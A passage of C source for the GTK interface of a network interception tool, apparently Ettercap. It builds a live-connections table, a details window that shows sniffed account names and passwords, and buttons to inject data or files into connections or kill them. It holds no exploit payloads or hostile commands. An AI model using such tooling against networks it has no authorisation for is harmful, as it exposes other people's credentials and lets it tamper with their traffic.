(GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("TX Bytes", renderer, "text", 8, NULL); gtk_tree_view_column_set_sort_column_id (column, 8); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("RX Bytes", renderer, "text", 9, NULL); gtk_tree_view_column_set_sort_column_id (column, 9); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); #ifdef HAVE_GEOIP renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Countries", renderer, "text", 10, NULL); gtk_tree_view_column_set_sort_column_id (column, 10); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); #endif hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, TRUE); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); gtk_widget_show(hbox); button = gtk_button_new_with_mnemonic("View _Details"); g_signal_connect (G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_detail), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); gtk_widget_show(button); button = gtk_button_new_with_mnemonic("_Kill Connection"); g_signal_connect (G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_kill), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); gtk_widget_show(button); button = gtk_button_new_with_mnemonic("E_xpunge Connections"); g_signal_connect (G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_purge), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); gtk_widget_show(button); /* context menu */ context_menu = gtk_menu_new(); items = gtk_menu_item_new_with_label("View Details"); gtk_menu_shell_append (GTK_MENU_SHELL (context_menu), items); g_signal_connect (G_OBJECT (items), "activate", G_CALLBACK (gtkui_connection_detail), NULL); gtk_widget_show (items); items = gtk_menu_item_new_with_label("Kill Connection"); gtk_menu_shell_append (GTK_MENU_SHELL (context_menu), items); g_signal_connect (G_OBJECT (items), "activate", G_CALLBACK (gtkui_connection_kill), NULL); gtk_widget_show (items); g_signal_connect(G_OBJECT(treeview), "button-press-event", G_CALLBACK(gtkui_context_menu), context_menu); /* initialize the list */ refresh_connections(NULL); /* init filter model handle */ filter.model = gtk_tree_model_filter_new(GTK_TREE_MODEL(ls_conns), NULL); gtk_tree_model_filter_set_visible_func(GTK_TREE_MODEL_FILTER(filter.model), (GtkTreeModelFilterVisibleFunc)connfilter, NULL, NULL); /* sorting model has to be explicitely created from the filtered model to support both */ model = gtk_tree_model_sort_new_with_model(filter.model); /* link the Tree Model with the Tree View */ gtk_tree_view_set_model(GTK_TREE_VIEW (treeview), model); /* refresh the list every 1000 ms */ /* gtk_idle_add refreshes too fast, uses all cpu */ connections_idle = g_timeout_add(1000, refresh_connections, NULL); gtk_widget_show(conns_window); } /* callback for detaching the tab */ void gtkui_connections_detach(GtkWidget *child) { conns_window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW (conns_window), "Live connections"); gtk_window_set_default_size(GTK_WINDOW (conns_window), 500, 250); g_signal_connect(G_OBJECT(conns_window), "delete_event", G_CALLBACK(gtkui_kill_connections), NULL); /* make d shortcut turn the window back into a tab */ gtkui_page_attach_shortcut(conns_window, gtkui_connections_attach); gtk_container_add(GTK_CONTAINER (conns_window), child); gtk_window_present(GTK_WINDOW (conns_window)); } /* callback for attaching the tab */ static void gtkui_connections_attach(void) { gtkui_kill_connections(); gtkui_show_connections(); } /* connection list closed */ static void gtkui_kill_connections(void) { DEBUG_MSG("gtk_kill_connections"); g_source_remove(connections_idle); gtk_widget_destroy(conns_window); conns_window = NULL; } /* for keeping the connection list in sync with the conntrack list */ static gboolean refresh_connections(gpointer data) { struct row_pairs *lastconn = NULL, *cache = NULL; GtkTreeModel *model = GTK_TREE_MODEL (ls_conns); void *list, *next, *listend; struct conn_object *conn; /* stores connection details */ GtkTreeIter iter; /* points to a specific row */ char flags[2], status[8]; unsigned int tx = 0, rx = 0; struct row_pairs *row = NULL, *nextrow = NULL, top, bottom; /* variable not used */ (void) data; /* init strings */ memset(&flags, 0, sizeof(flags)); memset(&status, 0, sizeof(status)); /* make sure the list has been created and window is visible */ if(ls_conns) { if (!gtk_widget_get_visible(conns_window)) return(FALSE); } else { /* Columns: Flags, Host, Port, "-", Host, Port, Proto, State, TX Bytes, RX Bytes, Countries, (hidden) pointer */ ls_conns = gtk_list_store_new (12, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_UINT, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_UINT, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_UINT, G_TYPE_UINT, G_TYPE_STRING, G_TYPE_POINTER); connections = NULL; } /* remove old connections */ for(row = connections; row; row = nextrow) { nextrow = row->next; if(conntrack_get(0, row->conn, NULL) == NULL) { /* remove row from the GTK list */ gtk_list_store_remove(GTK_LIST_STORE(ls_conns), &row->iter); /* remove pointers from the linked-list and free */ if(row->next) row->next->prev = row->prev; if(row->prev) row->prev->next = row->next; else connections = row->next; SAFE_FREE(row); } if(row) lastconn = row; } /* make sure we have a place to start searching for new rows */ if(!lastconn) { listend = conntrack_get(0, NULL, NULL); if(listend == NULL) return(TRUE); } else { listend = lastconn->conn; } /* add new connections */ for(list = conntrack_get(+1, listend, NULL); list; list = next) { next = conntrack_get(+1, list, &conn); cache = gtkui_connections_add(conn, list, &connections); if(cache) lastconn = cache; } /* find the first and last visible rows */ gtkui_connection_list_row(1, &top); gtkui_connection_list_row(0, &bottom); if(top.conn == NULL) return(TRUE); iter = top.iter; /* copy iter by value */ /* update visible part of list */ do { /* get the conntrack pointer for this row */ gtk_tree_model_get (model, &iter, 11, &list, -1); conntrack_get(0, list, &conn); /* extract changing values from conntrack_print string */ conntrack_flagstr(conn, flags, sizeof(flags)); conntrack_statusstr(conn, status, sizeof(status)); tx = conn->tx; rx = conn->rx; gtk_list_store_set (ls_conns, &iter, 0, flags, 7, status, 8, tx, 9, rx, -1); /* when we reach the bottom of the visible part, stop updating */ if(bottom.conn == list) break; } while(gtk_tree_model_iter_next(model, &iter)); /* finnaly apply the filter */ gtk_tree_model_filter_refilter(GTK_TREE_MODEL_FILTER(filter.model)); return(TRUE); } static struct row_pairs *gtkui_connections_add(struct conn_object *co, void *conn, struct row_pairs **list) { GtkTreeIter iter; char flags[2], src[MAX_ASCII_ADDR_LEN], dst[MAX_ASCII_ADDR_LEN]; char proto[4], status[8], ccodes[8]; unsigned int src_port = 0, dst_port = 0, tx = 0, rx = 0; struct row_pairs *row = NULL; /* even if list is empty, we need a pointer to the NULL pointer */ /* so we can start a list */ if(!list) return(NULL); /* init strings */ memset(&flags, 0, sizeof(flags)); memset(&proto, 0, sizeof(proto)); memset(&src, 0, sizeof(src)); memset(&dst, 0, sizeof(dst)); memset(&status, 0, sizeof(status)); memset(&ccodes, 0, sizeof(ccodes)); /* copy data from conntrack_print string */ conntrack_flagstr(co, flags, sizeof(flags)); conntrack_statusstr(co, status, sizeof(status)); conntrack_protostr(co, proto, sizeof(proto)); conntrack_countrystr(co, ccodes, sizeof(ccodes)); ip_addr_ntoa(&co->L3_addr1, src); ip_addr_ntoa(&co->L3_addr2, dst); src_port = ntohs(co->L4_addr1); dst_port = ntohs(co->L4_addr2); tx = co->tx; rx = co->rx; /* add it to GTK list */ gtk_list_store_append (ls_conns, &iter); gtk_list_store_set (ls_conns, &iter, 0, flags, 1, src, 2, src_port, 3, "-", 4, dst, 5, dst_port, 6, proto, 7, status, 8, tx, 9, rx, 10, ccodes, 11, conn, -1); /* and add it to our linked list */ if(!*list) { row = malloc(sizeof(struct row_pairs)); if(row == NULL) { USER_MSG("Failed create new connection row\n"); DEBUG_MSG("gktui_connections_add: failed to allocate memory for a new row"); } row->prev = NULL; } else { for(row = *list; row && row->next; row = row->next); row->next = malloc(sizeof(struct row_pairs)); if(row->next == NULL) { USER_MSG("Failed create new connection row\n"); DEBUG_MSG("gktui_connections_add: failed to allocate memory for a new row"); } row->next->prev = row; row = row->next; } row->conn = conn; row->iter = iter; row->next = NULL; /* in case this was the first list entry */ if(!*list) *list = row; return(row); } /* * get the top or bottom visible row in the connection list * returns TOP row if (int top) is > 0 and list is not empty * returns BOTTOM row if (int top) is 0 and visible area is full */ static void gtkui_connection_list_row(int top, struct row_pairs *pair) { GtkTreeIter iter; /* points to a specific row */ GtkTreePath *path = NULL; /* for finding the first visible row */ GtkTreeModel *model = NULL; /* points to the list data */ GdkRectangle rect; /* holds coordinates of visible rows */ int wx = 0, wy = 0; /* for converting tree view coords to widget coords */ void *row = NULL; if(!ls_conns || !pair) return; /* in case we don't get a row */ pair->conn = NULL; model = GTK_TREE_MODEL (ls_conns); if(gtk_tree_model_get_iter_first(model, &iter)) { gtk_tree_view_get_visible_rect(GTK_TREE_VIEW(treeview), &rect); /* get the first visible row */ gtk_tree_view_convert_bin_window_to_widget_coords(GTK_TREE_VIEW(treeview), rect.x, (top)?rect.y:rect.height, &wx, &wy); path = gtk_tree_path_new(); if(gtk_tree_view_get_path_at_pos(GTK_TREE_VIEW(treeview), wx+2, (top)?wy+2:wy-2, &path, NULL, NULL, NULL)) { gtk_tree_model_get_iter(model, &iter, path); gtk_tree_model_get (model, &iter, 11, &row, -1); pair->iter = iter; pair->conn = row; } if(path) gtk_tree_path_free(path); } return; } /* * details for a connection */ static void gtkui_connection_detail(void) { GtkWidget *dwindow, *vbox, *hbox, *table, *label, *button; GtkTreeIter iter; GtkTreeModel *model; struct conn_tail *c = NULL; char tmp[MAX_ASCII_ADDR_LEN]; char name[MAX_HOSTNAME_LEN]; gchar *str, *markup; guint nrows = 14, ncols = 3, row = 0, col = 0; DEBUG_MSG("gtk_connection_detail"); model = GTK_TREE_MODEL (ls_conns); if (gtk_tree_selection_get_selected (GTK_TREE_SELECTION (selection), &model, &iter)) { gtk_tree_model_get (model, &iter, 11, &c, -1); } else return; /* nothing is selected */ if(!c || !c->co) return; dwindow = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW(dwindow), "Connection Details"); gtk_window_set_modal(GTK_WINDOW(dwindow), TRUE); gtk_window_set_transient_for(GTK_WINDOW(dwindow), GTK_WINDOW(window)); gtk_window_set_position(GTK_WINDOW(dwindow), GTK_WIN_POS_CENTER_ON_PARENT); gtk_container_set_border_width(GTK_CONTAINER(dwindow), 5); g_signal_connect(G_OBJECT(dwindow), "delete-event", G_CALLBACK(gtkui_connection_detail_destroy), NULL); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 5, FALSE); gtk_container_add(GTK_CONTAINER(dwindow), vbox); table = gtk_table_new(nrows, ncols, FALSE); gtk_table_set_row_spacings(GTK_TABLE(table), 5); gtk_table_set_col_spacings(GTK_TABLE(table), 5); gtk_container_set_border_width(GTK_CONTAINER(table), 8); gtk_box_pack_start(GTK_BOX(vbox), table, FALSE, FALSE, 0); /* Layer 2 Information */ label = gtk_label_new("Layer 2 Information:"); markup = g_markup_printf_escaped("%s", gtk_label_get_text(GTK_LABEL(label))); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+3, row, row+1, GTK_FILL, GTK_FILL, 0, 0); g_free(markup); row++; label = gtk_label_new("Source MAC address:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new(mac_addr_ntoa(c->co->L2_addr1, tmp)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); row++; label = gtk_label_new("Destination MAC address:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new(mac_addr_ntoa(c->co->L2_addr2, tmp)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); /* Layer 3 information */ row++; label = gtk_label_new("Layer 3 Information:"); markup = g_markup_printf_escaped("%s", gtk_label_get_text(GTK_LABEL(label))); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+3, row, row+1, GTK_FILL, GTK_FILL, 0, 0); gtk_table_set_row_spacing(GTK_TABLE(table), row-1, 10); g_free(markup); row++; label = gtk_label_new("Source IP address:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new(ip_addr_ntoa(&c->co->L3_addr1, tmp)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); if (EC_GBL_OPTIONS->resolve) { row++; label = gtk_label_new("Source hostname:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new("resolving..."); if (host_iptoa(&c->co->L3_addr1, name) == -E_NOMATCH) { /* IP not yet resolved - keep trying asyncronously */ struct resolv_object *ro; SAFE_CALLOC(ro, 1, sizeof(struct resolv_object)); ro->type = GTK_TYPE_LABEL; ro->widget = label; ro->ip = &c->co->L3_addr1; detail_timer1 = g_timeout_add(1000, gtkui_iptoa_deferred, ro); } else { gtk_label_set_text(GTK_LABEL(label), name); } gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); } #ifdef HAVE_GEOIP if (EC_GBL_CONF->geoip_support_enable) { row++; label = gtk_label_new("Source location:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new(geoip_country_by_ip(&c->co->L3_addr1)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); } #endif row++; label = gtk_label_new("Destination IP address:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new(ip_addr_ntoa(&c->co->L3_addr2, tmp)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); if (EC_GBL_OPTIONS->resolve) { row++; label = gtk_label_new("Destination hostname:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new("resolving..."); if (host_iptoa(&c->co->L3_addr2, name) == -E_NOMATCH) { /* IP not yet resolved - keep trying asyncronously */ struct resolv_object *ro; SAFE_CALLOC(ro, 1, sizeof(struct resolv_object)); ro->type = GTK_TYPE_LABEL; ro->widget = label; ro->ip = &c->co->L3_addr2; detail_timer2 = g_timeout_add(1000, gtkui_iptoa_deferred, ro); } else { gtk_label_set_text(GTK_LABEL(label), name); } gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); } #ifdef HAVE_GEOIP if (EC_GBL_CONF->geoip_support_enable) { row++; label = gtk_label_new("Destination location:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new(geoip_country_by_ip(&c->co->L3_addr2)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); } #endif /* Layer 4 information */ row++; label = gtk_label_new("Layer 4 Information:"); markup = g_markup_printf_escaped("%s", gtk_label_get_text(GTK_LABEL(label))); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+3, row, row+1, GTK_FILL, GTK_FILL, 0, 0); gtk_table_set_row_spacing(GTK_TABLE(table), row-1, 10); g_free(markup); row++; label = gtk_label_new("Protocol:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); switch(c->co->L4_proto) { case NL_TYPE_UDP: label = gtk_label_new("UDP"); break; case NL_TYPE_TCP: label = gtk_label_new("TCP"); break; default: label = gtk_label_new(""); break; } gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); row++; label = gtk_label_new("Source port:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new((str = g_strdup_printf("%d", ntohs(c->co->L4_addr1)))); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+2, row, row+1); g_free(str); label = gtk_label_new(service_search(c->co->L4_addr1, c->co->L4_proto)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+2, col+3, row, row+1); row++; label = gtk_label_new("Destination port:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new((str = g_strdup_printf("%d", ntohs(c->co->L4_addr2)))); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+2, row, row+1); g_free(str); label = gtk_label_new(service_search(c->co->L4_addr2, c->co->L4_proto)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+2, col+3, row, row+1); row++; label = gtk_label_new("Transferred bytes:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new((str = g_strdup_printf("%d", c->co->xferred))); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); g_free(str); /* Additional information */ if (c->co->DISSECTOR.user) { row++; label = gtk_label_new("Additional Information:"); markup = g_markup_printf_escaped("%s", gtk_label_get_text(GTK_LABEL(label))); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+3, row, row+1, GTK_FILL, GTK_FILL, 0, 0); gtk_table_set_row_spacing(GTK_TABLE(table), row-1, 10); g_free(markup); row++; label = gtk_label_new("Account:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new(c->co->DISSECTOR.user); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+2, row, row+1); label = gtk_label_new(c->co->DISSECTOR.pass); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+2, col+3, row, row+1); if (c->co->DISSECTOR.info) { label = gtk_label_new("Additional info:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new(c->co->DISSECTOR.info); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); } } /* resize table to the acutal size */ gtk_table_resize(GTK_TABLE(table), row, ncols); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 0, FALSE); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); button = gtk_button_new_from_stock(GTK_STOCK_CLOSE); g_signal_connect_swapped(G_OBJECT(button), "clicked", G_CALLBACK(gtkui_connection_detail_destroy), dwindow); gtk_box_pack_end(GTK_BOX(hbox), button, FALSE, FALSE, 0); gtk_widget_grab_focus(button); gtk_widget_show_all(dwindow); } static void gtkui_connection_detail_destroy(GtkWidget *widget, gpointer *data) { /* unused variable */ (void) data; /* destroy timer if still running */ if (detail_timer1) g_source_remove(detail_timer1); if (detail_timer2) g_source_remove(detail_timer2); /* destroy widget */ gtk_widget_destroy(widget); } static void gtkui_connection_data(void) { GtkTreeIter iter; GtkTreeModel *model; struct conn_tail *c = NULL; DEBUG_MSG("gtk_connection_data"); model = GTK_TREE_MODEL (ls_conns); if (gtk_tree_selection_get_selected (GTK_TREE_SELECTION (selection), &model, &iter)) { gtk_tree_model_get (model, &iter, 11, &c, -1); } else return; /* nothing is selected */ if(c == NULL || c->co == NULL) return; /* just to be safe */ /* * remove any hook on the open connection. * this is done to prevent a switch of connection * with the panel opened */ if (curr_conn) { conntrack_hook_conn_del(curr_conn, split_print_po); conntrack_hook_conn_del(curr_conn, join_print_po); /* remove the viewing flag */ curr_conn->flags &= ~CONN_VIEWING; } /* set the global variable to pass the parameter to other functions */ curr_conn = c->co; curr_conn->flags |= CONN_VIEWING; /* default is split view */ gtkui_connection_data_split(); } /* * show the content of the connection */ static void gtkui_connection_data_split(void) { GtkWidget *vbox, *scrolled, *label, *child; GtkWidget *hbox_big, *hbox_small, *button; GtkTextIter iter; char tmp[MAX_ASCII_ADDR_LEN]; char title[MAX_ASCII_ADDR_LEN+6]; static gint scroll_split = 1; DEBUG_MSG("gtk_connection_data_split"); /* if we're switching views, make sure old hook is gone */ conntrack_hook_conn_del(curr_conn, join_print_po); if(data_window) { child = gtk_bin_get_child(GTK_BIN (data_window)); gtk_container_remove(GTK_CONTAINER (data_window), child); textview3 = NULL; joinedbuf = NULL; endmark3 = NULL; } else { data_window = gtkui_page_new("Connection data", >kui_destroy_conndata, >kui_connection_data_detach); } /* don't timeout this connection */ curr_conn->flags |= CONN_VIEWING; hbox_big = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, TRUE); gtk_container_add(GTK_CONTAINER(data_window), hbox_big); gtk_widget_show(hbox_big); /*** left side ***/ vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 0, FALSE); gtk_box_pack_start(GTK_BOX(hbox_big), vbox, TRUE, TRUE, 0); gtk_widget_show(vbox); /* title */ snprintf(title, MAX_ASCII_ADDR_LEN+6, "%s:%d", ip_addr_ntoa(&curr_conn->L3_addr1, tmp), ntohs(curr_conn->L4_addr1)); label = gtk_label_new(title); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_box_pack_start(GTK_BOX(vbox), label, FALSE, FALSE, 0); gtk_widget_show(label); /* data */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); textview1 = gtk_text_view_new(); gtk_text_view_set_wrap_mode(GTK_TEXT_VIEW (textview1), GTK_WRAP_CHAR); gtk_text_view_set_editable(GTK_TEXT_VIEW (textview1), FALSE); gtk_text_view_set_cursor_visible(GTK_TEXT_VIEW (textview1), FALSE); gtk_text_view_set_right_margin(GTK_TEXT_VIEW (textview1), 5); gtk_text_view_set_right_margin(GTK_TEXT_VIEW (textview1), 5); gtk_container_add(GTK_CONTAINER (scrolled), textview1); gtk_widget_show(textview1); splitbuf1 = gtk_text_view_get_buffer(GTK_TEXT_VIEW (textview1)); gtk_text_buffer_create_tag (splitbuf1, "blue_fg", "foreground", "blue", NULL); gtk_text_buffer_create_tag (splitbuf1, "monospace", "family", "monospace", NULL); gtk_text_buffer_get_end_iter(splitbuf1, &iter); endmark1 = gtk_text_buffer_create_mark(splitbuf1, "end", &iter, FALSE); /* first two buttons */ hbox_small = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, TRUE); gtk_box_pack_start(GTK_BOX(vbox), hbox_small, FALSE, FALSE, 0); gtk_widget_show(hbox_small); button = gtk_button_new_with_mnemonic("_Join Views"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_data_join), NULL); gtk_box_pack_start(GTK_BOX(hbox_small), button, TRUE, TRUE, 0); gtk_widget_show(button); button = gtk_button_new_with_mnemonic("_Inject Data"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_inject), NULL); gtk_box_pack_start(GTK_BOX(hbox_small), button, TRUE, TRUE, 0); gtk_widget_show(button); /*** right side ***/ vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 0, FALSE); gtk_box_pack_start(GTK_BOX(hbox_big), vbox, TRUE, TRUE, 0); gtk_widget_show(vbox); /* title */ snprintf(title, MAX_ASCII_ADDR_LEN+6, "%s:%d", ip_addr_ntoa(&curr_conn->L3_addr2, tmp), ntohs(curr_conn->L4_addr2)); label = gtk_label_new(title); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_box_pack_start(GTK_BOX(vbox), label, FALSE, FALSE, 0); gtk_widget_show(label); /* data */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); textview2 = gtk_text_view_new(); gtk_text_view_set_wrap_mode(GTK_TEXT_VIEW (textview2), GTK_WRAP_CHAR); gtk_text_view_set_editable(GTK_TEXT_VIEW (textview2), FALSE); gtk_text_view_set_cursor_visible(GTK_TEXT_VIEW (textview2), FALSE); gtk_text_view_set_right_margin(GTK_TEXT_VIEW (textview2), 5); gtk_text_view_set_right_margin(GTK_TEXT_VIEW (textview2), 5); gtk_container_add(GTK_CONTAINER (scrolled), textview2); gtk_widget_show(textview2); splitbuf2 = gtk_text_view_get_buffer(GTK_TEXT_VIEW (textview2)); gtk_text_buffer_create_tag (splitbuf2, "blue_fg", "foreground", "blue", NULL); gtk_text_buffer_create_tag (splitbuf2, "monospace", "family", "monospace", NULL); gtk_text_buffer_get_end_iter(splitbuf2, &iter); endmark2 = gtk_text_buffer_create_mark(splitbuf2, "end", &iter, FALSE); /* second two buttons */ hbox_small = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, TRUE); gtk_box_pack_start(GTK_BOX(vbox), hbox_small, FALSE, FALSE, 0); gtk_widget_show(hbox_small); button = gtk_button_new_with_mnemonic("Inject _File"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_inject_file), NULL); gtk_box_pack_start(GTK_BOX(hbox_small), button, TRUE, TRUE, 0); gtk_widget_show(button); button = gtk_button_new_with_mnemonic("_Kill Connection"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_kill_curr_conn), NULL); gtk_box_pack_start(GTK_BOX(hbox_small), button, TRUE, TRUE, 0); gtk_widget_show(button); gtk_widget_show(data_window); if(GTK_IS_WINDOW (data_window)) gtk_window_present(GTK_WINDOW (data_window)); else gtkui_page_present(data_window); /* after widgets are drawn, scroll to bottom */ g_timeout_add(500, gtkui_connections_scroll, &scroll_split); /* print the old data */ connbuf_print(&curr_conn->data, split_print); /* add the hook on the connection to receive data only from it */ conntrack_hook_conn_add(curr_conn, split_print_po); } /* detach connection data tab */ static void gtkui_connection_data_detach(GtkWidget *child) { data_window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW (data_window), "Connection 